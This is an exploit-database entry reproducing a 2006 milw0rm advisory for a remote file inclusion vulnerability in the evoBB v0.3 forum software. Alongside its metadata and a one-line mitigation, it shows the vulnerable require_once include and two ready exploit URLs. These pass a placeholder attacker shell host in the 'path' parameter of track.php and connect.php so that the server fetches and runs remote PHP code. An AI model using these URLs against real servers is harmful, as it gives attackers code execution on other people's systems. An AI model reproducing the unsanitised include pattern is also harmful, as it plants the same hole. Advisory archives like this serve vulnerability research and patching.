header-logo
Suggest Exploit
vendor:
evoBB
by:
SHiKaA
N/A
CVSS
N/A
Remote File Inclusion
98
CWE
Product Name: evoBB
Affected Version From: v0.3
Affected Version To: v0.3
Patch Exists: YES
Related CWE: N/A
CPE: a:4yougratis.it:evobb:0.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

evoBB <= v0.3 (path) Remote File Inclusion Exploit

evoBB v0.3 is vulnerable to a remote file inclusion vulnerability due to a lack of sanitization of user-supplied input in the 'path' parameter of the 'track.php' and 'connect.php' scripts. An attacker can exploit this vulnerability to execute arbitrary PHP code on the vulnerable server.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

#==============================================================================================
#evoBB <= v0.3 (path) Remote File Inclusion Exploit
#===============================================================================================
#                                                                      
#Critical Level : Dangerous                                            
#                                                                      
#Venedor site : http://www.4yougratis.it/script_php/forum/evoBBv0.3.htm     
#                                                                      
#Version : v0.3                                            
#                                                        
#================================================================================================
#Bug in : track.php
#
#Vlu Code :
#--------------------------------
#
#        require_once($path.'connect.php');
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/track.php?path=http://SHELLURL.COM
#http://sitename.com/[Script Path]/connect.php?path=http://SHELLURL.COM
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#Special Thx To : Str0ke & simoo & Timq & XoRoN & Saudi HAckerz
==================================================================================================

# milw0rm.com [2006-09-25]